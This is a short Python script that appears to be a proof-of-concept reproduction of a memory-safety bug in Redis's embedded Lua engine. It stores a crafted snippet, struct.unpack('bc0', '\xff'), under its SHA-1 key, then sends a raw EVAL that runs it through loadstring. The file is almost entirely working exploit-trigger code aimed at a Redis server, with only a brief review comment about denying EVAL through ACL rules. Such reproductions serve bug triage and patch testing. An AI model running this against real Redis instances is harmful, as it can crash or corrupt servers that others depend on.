import socket | |
import hashlib | |
#3rd party | |
import redis #pip install | |
# Target of the reproduction: the loopback address and port 6379. Both the
# redis client and the raw socket in this script connect to this pair.
server, port = '127.0.0.1', 6379
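def send_to_redis(server, port, data, timeout=2):
    """Write ``data`` to ``server:port`` over a plain TCP socket.

    The reply is never read: the socket is closed as soon as the bytes have
    been written, so the caller learns nothing about how the server reacted.

    Args:
        server: Host name or IP address to connect to.
        port: TCP port to connect to.
        data: Bytes to transmit, already framed the way the server expects.
        timeout: Seconds allowed for the connect and for the send.

    Returns:
        None. A timeout is reported on stdout instead of being raised.

    Raises:
        socket.error: For failures other than a timeout (for example a
            refused connection); these propagate to the caller.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        # connect() is inside the try so that a connect timeout reaches the
        # handler whose message describes it.
        s.connect((server, port))
        # sendall() retries short writes; send() may transmit only a prefix.
        s.sendall(data)
    except socket.timeout:
        print('Unable to connect to target ; returning')
        return None
    finally:
        # Also runs on the timeout path, so the descriptor is never leaked.
        s.close()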
def main():
    """Store a Lua snippet in Redis, then ask the server to EVAL it.

    The snippet is written with SET under a key named after its SHA-1 hex
    digest. An inline ``eval`` command is then sent over a raw socket; its
    script fetches that key with GET and runs the value through
    ``loadstring``, so the stored bytes execute as Lua inside the server.
    """
    # Lua source containing a raw 0xff byte, which is why it is staged through
    # the client library and not typed on a command line.
    # NOTE(review): presumably 'b' reads 0xff as a signed byte and 'c0' then
    # takes that value as a string length -- confirm against the struct
    # library source.
    lua_source = 'return struct.unpack(\'bc0\', \'\xff\')'
    digest_key = hashlib.sha1(lua_source).hexdigest()

    # Stage the snippet as an ordinary string value.
    client = redis.StrictRedis(host=server, port=port)
    client.set(digest_key, lua_source)

    # Inline-protocol EVAL with one key argument. send_to_redis() never reads
    # the reply, so this script cannot tell whether the server ran or rejected
    # the call; check the server log afterwards.
    # NOTE(review): instances that must not run client-supplied Lua can deny
    # EVAL/EVALSHA through ACL rules or rename-command.
    eval_line = 'eval "return loadstring(redis.call(\'get\', KEYS[1]))()" 1 %s\n' % digest_key
    send_to_redis(server, port, eval_line)
# Run the reproduction only when executed as a script, never on import.
if __name__ == '__main__':
    main()